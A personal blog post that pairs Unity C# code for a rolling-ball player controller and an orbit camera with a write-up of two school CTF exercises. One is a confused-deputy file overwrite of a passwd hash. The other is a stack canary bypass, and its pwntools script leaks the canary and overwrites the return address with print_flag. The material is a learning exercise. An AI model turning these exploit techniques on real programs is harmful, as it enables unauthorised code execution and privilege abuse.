CTF homework and Unity random stuff

nananana·2022년 10월 28일
0

Limited the maximum velocity (so no more clip through walls) + Rotating camera.

However camera rotate is horrible and the terrain asset seems to have some dependency issues :(

I am currently planning to add some collectables with basic UI and not sure after that.

Maybe more tutorial videos? Not sure.

using System.Collections;
using System.Collections.Generic;
using UnityEngine;


public class PlayerControl : MovingObject{
    bool IsJumpKeyPressed;
    bool IsGrounded;
    bool CanDoubleJump;
    int maxVelocity = 15;
    public LayerMask GroundLayer;
    Rigidbody rb;
    void Start(){
        rb = GetComponent<Rigidbody>();
        IsJumpKeyPressed = false;
        IsGrounded = false;
        GroundLayer = LayerMask.GetMask("Ground");
    }
    void Update(){
        if(Input.GetButtonDown("Jump") & IsGrounded){
            IsJumpKeyPressed = true;
        }else if(Input.GetButtonDown("Jump") & CanDoubleJump){
            IsJumpKeyPressed = true;
            CanDoubleJump = false;
        }
        if(!CanDoubleJump & IsGrounded){
            CanDoubleJump = true;
        }
        Floor();


        
    }
    //https://answers.unity.com/questions/1458194/proper-way-to-set-a-rigidbodys-maximum-velocity.html
    void FixedUpdate(){
        if(IsJumpKeyPressed){
            Jump(7, rb);
            IsJumpKeyPressed = false;
            // Debug.Log("jump!");
        }

        if(rb.velocity.magnitude > maxVelocity){
            rb.velocity = rb.velocity.normalized * maxVelocity;
        }
        if(IsGrounded)
            Roll(Input.GetAxis("Horizontal"), 0.5f, Input.GetAxis("Vertical"), 0.5f, rb);
    }
    private void Floor(){
        IsGrounded = Physics.CheckSphere(transform.position, 0.6f, GroundLayer);
    }
}
using System.Collections;
using System.Collections.Generic;
using UnityEngine;


//https://stackoverflow.com/questions/54852001/rotate-camera-around-a-gameobject-on-mouse-drag-in-unity
//https://forum.unity.com/threads/rotate-the-camera-around-the-object.47353/

public class CameraControl : MonoBehaviour{
    public GameObject player;
    private Vector3 offset;
    private Vector3 point;
    void Start(){
        offset = transform.position - player.transform.position;
    }
    void Update(){

        
        transform.RotateAround(player.transform.position, Vector3.up, Input.GetAxis("Mouse X")*5);
        transform.RotateAround(player.transform.position, Vector3.right, -Input.GetAxis("Mouse Y")*5);
        
    }
    void LateUpdate(){
        transform.position = player.transform.position + offset;
        // transform.Translate(Vector3.right * Time.deltaTime);
    }
}

======================================

For school homework I finished two CTFs. Confused Deputy and Stack Canary bypass.

Confused Deputy

Basically using the privilege of a another program I can execute privileged processes.

This CTF was actually really easy and I didn't even need to code. The basic directory had the form:

base
|
|--flag
|--passwd
|--executable

The executable will receive a username and a password. The SHA-256 hash value of the password will be generated and compared with passwd. Then if they don't have the same value the password will be saved into a new file with the file name as username.

So we name username "passwd" and take a random string "abcd" get it's SHA-256 value from the internet and make a new passwd file.

Then I make a new user with password abcd the SHA-256 hash will be the same and I get my flag. Done!

Bypass Stack Canary

This project had a grading software with 7 students starting from index 0 to 6. Now index 7 had a printable student hence a "ghost student".

Unfortunately we cannot write on the ghost student but we can write on the 6th student and overwrite into the ghost student.

Also after exiting the program there is stack smashing detected.

This tells us two things.

#1 We are writing on stack so we can overwrite return address.

#2 Stack canary is in place and it is checked before return.

Looking into the disassembly I quickly determined that the stack canary was stored in $rsp+0x108. It was very easy since after $rax is stored with $rsp+0x108 and it is compared with $fs + something.

Now interestingly this $rsp + 0x108 data can be printed (although in integer format) when we print the 7th student. So we can proceed to extract this integer value and convert it to hexadecimal canary value.

Also disassembling the code we see that there is a function with print_flag capabilities (this is ctf afterall).

So not sure if the code prevents execution from stack (maybe?) but we don't need shellcode anyways.

attack code = (padding) + canary(extracted) + (padding) + address of print_flag

Inject this and we have finished the attack.

from pwn import *
import re

target = "./ghost-student"

context.log_level = 'debug'


p = process(target)
io = p
io.recv()
io.sendline('2')
io.sendline('7')
line = io.recv()
m = re.findall(r'[0-9][0-9]+', line.decode(), re.I)
print(m)
print(m[3]) #second
print(m[2]) #first


first_val = int(m[3])
first = hex(first_val)

second_val = int(m[2], 16)
second = hex(second_val)

print(first)
print(second)


attack = b''
attack += b'a' * 16
attack += p64(second_val) 
attack += p64(first_val)
attack += b'a' * 24
attack += p64(0x401374)

io.sendline('3')
io.sendline('6')
io.sendline(attack)
io.sendline('0')

io.interactive()

0개의 댓글